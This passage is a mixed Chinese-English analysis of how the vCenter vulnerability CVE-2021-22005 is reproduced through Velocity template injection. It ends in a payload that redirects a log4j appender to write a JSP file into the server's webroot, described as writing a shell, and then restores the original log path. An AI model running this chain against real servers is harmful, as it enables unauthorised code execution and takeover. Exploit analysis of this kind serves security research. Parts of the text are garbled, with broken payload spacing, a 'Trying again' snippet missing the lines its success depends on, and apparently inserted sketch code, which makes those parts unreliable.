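        Marshaller marshaller = context.createMarshaller();
        marshaller.setProperty(Marshaller.JAXB_FORMATTED_OUTPUT, true);
        marshaller.marshal(o, System.out);
    }
}
```

With that in place, execution reaches the point where the template injection is triggered.

3.3 Velocity template injection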



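The screenshots in this part were taken while reproducing the 1-day earlier, so only the element contents matter.

Call chain:

When the string aaa is passed, execution breaks at com.vmware.ph.phservice.collector.internal.cdf.mapping.ResourceItemToJsonLdMapping#map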



The context variables are loaded in com.vmware.ph.phservice.collector.internal.cdf.mapping.velocity.VelocityHelper#static():





经过调试发现这里的velocity context并不包含常见的$request、$session变量,可用变量共26个,其中大部分是string信息,最初看到testbnull师傅截图,是通过修改这个”GLOBAL-logger”下属性值_fileName达到写文件目的。开始分析下



然后开始调试:

1 velocityEngine.evaluate(substitutor, dummySw, logTag, "# set ($log = $GLOBAL -logger .logger .parent .aai )





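It turns out that aai cannot be reached directly with the dot operator. Neither the class behind parent, org.apache.log4j.spi.RootLogger, nor its parent class org.apache.log4j.Logger declares this variable; it is declared in the grandparent class org.apache.log4j.Category.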
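Why the dot operator fails: as far as we understand Velocity 1.7's default introspection, `$obj.prop` is resolved through public methods (roughly `getProp()`/`getprop()`, then `get("prop")`, then `isProp()`), and fields are never read. The sketch below is a simplified approximation of that order with Java reflection, plus a three-level class hierarchy standing in for RootLogger/Logger/Category. All class and method names are hypothetical.

```java
import java.lang.reflect.Method;

// Simplified approximation of Velocity-style property resolution.
// Only public methods are consulted; fields are never read.
final class VelocityLookupSketch {
    // Stand-ins for the log4j hierarchy: the field lives in the "grandparent".
    static class Grandparent {
        protected Object aai = "appender-list"; // non-public field, no getter
        public String getName() { return "root"; }
    }
    static class Parent extends Grandparent {}
    static class Child extends Parent {}

    private VelocityLookupSketch() {}

    // Tries getProp()/getprop(), then get(String), then isProp(); null if none exists.
    static Object resolve(Object target, String prop) {
        String cap = Character.toUpperCase(prop.charAt(0)) + prop.substring(1);
        try {
            for (String name : new String[] {"get" + cap, "get" + prop}) {
                Method m = findPublic(target.getClass(), name);
                if (m != null) return m.invoke(target);
            }
            Method get = findPublic(target.getClass(), "get", String.class);
            if (get != null) return get.invoke(target, prop);
            Method is = findPublic(target.getClass(), "is" + cap);
            if (is != null) return is.invoke(target);
        } catch (ReflectiveOperationException e) {
            throw new IllegalStateException(e);
        }
        return null; // an unresolved reference, which Velocity typically renders literally
    }

    private static Method findPublic(Class<?> c, String name, Class<?>... params) {
        try {
            return c.getMethod(name, params); // public methods only, inherited ones included
        } catch (NoSuchMethodException e) {
            return null;
        }
    }

    public static void main(String[] args) {
        Object child = new Child();
        System.out.println(resolve(child, "name")); // root
        System.out.println(resolve(child, "aai"));  // null
    }
}
```

The takeaway matches the debugging result: an inherited public method is reachable from the template, but a non-public field is not, no matter which ancestor declares it.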











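Since aai cannot be reached as a property, and methods such as superClass cannot be called either, I searched org.apache.log4j.Category for uses of aai and found that getAppender() returns the com.vmware.log4j.appender.NonAppendingRollingFileAppender object directly when given its _delegate.name value. That saves us from going through aai at all.

Here _delegate.name is LOGFILE.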
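The shape that makes this work is a private holder of appenders combined with a public lookup-by-name method. The sketch below models that shape; it is our simplified reading of log4j 1.x's Category/AppenderAttachableImpl relationship, and `AppenderLookupSketch`, `AppenderHolder` and `LoggerSketch` are hypothetical names, not log4j's API.

```java
import java.util.ArrayList;
import java.util.List;

// HYPOTHETICAL model: the appender holder is private, but a public
// getAppender(String) hands out individual appenders by name.
final class AppenderLookupSketch {
    interface Appender {
        String getName();
    }

    static final class NamedAppender implements Appender {
        private final String name;
        NamedAppender(String name) { this.name = name; }
        public String getName() { return name; }
    }

    // Plays the role of the object held in Category's non-public aai field.
    static final class AppenderHolder {
        private final List<Appender> appenders = new ArrayList<>();

        void add(Appender appender) { appenders.add(appender); }

        // Linear search by name; null when nothing matches.
        Appender getAppender(String name) {
            if (name == null) return null;
            for (Appender a : appenders) {
                if (name.equals(a.getName())) return a;
            }
            return null;
        }
    }

    // Plays the role of the logger that exposes the public lookup method.
    static final class LoggerSketch {
        private AppenderHolder aai;

        void addAppender(Appender appender) {
            if (aai == null) aai = new AppenderHolder();
            aai.add(appender);
        }

        public Appender getAppender(String name) {
            return aai == null ? null : aai.getAppender(name);
        }
    }

    private AppenderLookupSketch() {}

    public static void main(String[] args) {
        LoggerSketch root = new LoggerSketch();
        root.addAppender(new NamedAppender("CONSOLE"));
        root.addAppender(new NamedAppender("LOGFILE"));
        System.out.println(root.getAppender("LOGFILE").getName()); // LOGFILE
    }
}
```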



现在已经拿到NonAppendingRollingFileAppender对象,再调用属性_fileName的setter方法即可修改



构造语句测试:

1 2 3 # set ($log = $GLOBAL -logger .logger .parent ) # set ($narfazj = $log .getAppender (\"LOGFILE\" )

调试无问题:



burp测试时发现变量已修改,但是文件并未生成

直接使用logger.info()等方法时却还是写入默认文件

1 2 3 4 5 $log .info ("logbytest" )$log .debug ("logbytest" )$log .error ("logbytest" )$log .warn("logbytest" )

再次测试发现_fileName修改成功,但是并未创建jsp文件且日志还是写到了原来文件中



This means the log writer does not read _fileName. I then noticed that _delegate.fileName still held the default value /var/log/vmware/analytics/analytics.log.

com.vmware.log4j.appender.NonAppendingRollingFileAppender#activateOptions() copies the value of com.vmware.log4j.appender.NonAppendingRollingFileAppender#_fileName into _delegate.fileName.
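The behavior observed in Burp follows from a deferred-configuration split: the setter only records a pending value, and the object that actually writes sees it after activateOptions(). The in-memory model below reproduces that split without touching any files; `DeferredConfigSketch`, `WrapperAppender`, `Delegate` and `effectiveTarget()` are hypothetical names (only `_fileName` and `_delegate.fileName` come from the text), and the paths are placeholders.

```java
// HYPOTHETICAL model of the wrapper/delegate split: setFile() only updates the
// wrapper's own field; the delegate picks it up in activateOptions(). No I/O.
final class DeferredConfigSketch {
    // Stand-in for the inner object that would actually open and write the file.
    static final class Delegate {
        String fileName;
    }

    // Stand-in for the wrapper appender.
    static final class WrapperAppender {
        private String _fileName;
        final Delegate _delegate = new Delegate();

        WrapperAppender(String initialFile) {
            _fileName = initialFile;
            _delegate.fileName = initialFile;
        }

        // Records the pending value only.
        void setFile(String fileName) {
            _fileName = fileName;
        }

        // Copies the pending value into the delegate, as described for activateOptions().
        void activateOptions() {
            _delegate.fileName = _fileName;
        }

        // The target the delegate would actually use.
        String effectiveTarget() {
            return _delegate.fileName;
        }
    }

    private DeferredConfigSketch() {}

    public static void main(String[] args) {
        WrapperAppender appender = new WrapperAppender("/var/log/example/app.log");
        appender.setFile("/tmp/example/other.log");
        System.out.println(appender.effectiveTarget()); // /var/log/example/app.log
        appender.activateOptions();
        System.out.println(appender.effectiveTarget()); // /tmp/example/other.log
    }
}
```

This is the same reason the target has to be switched back and re-activated afterwards: until activateOptions() runs again, the delegate keeps using whatever value it was last given.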

Trying again:

```
#set($log = $GLOBAL-logger.logger.parent)
#set($narfazj = $log.getAppender("LOGFILE"))
```

Now the file is written!

Note that after writing the shell, you need to restore the fileName value to the original log file /var/log/vmware/analytics/analytics.log.



```
#set($log = $GLOBAL-logger.logger.parent)
#set($narfazj = $log.getAppender("LOGFILE"))
$narfazj.setFile("/usr/lib/vmware-sso/vmware-sts/webapps/ROOT/xxx.jsp")
$narfazj.activateOptions()
$log.info(\"<%=123%>\")
$narfazj.setFile("/var/log/vmware/analytics/analytics.log")
$narfazj.activateOptions()
```

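The screenshots in the log-debugging part were taken while analyzing the 1-day, so the POC shown in them does not exactly match the analysis above. While testing the POC, my breakpoints caught request data sent by the system itself, and from that you can also quickly locate the final resourceItemToJsonLdMapping object used for template injection.

This completes the tracing and reproduction of the VMware vCenter vulnerability CVE-2021-22005. I hope it helps!

4. References

https://testbnull.medium.com/quick-note-of-vcenter-rce-cve-2021-22005-4337d5a817ee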

https://www.vmware.com/security/advisories/VMSA-2021-0020.html
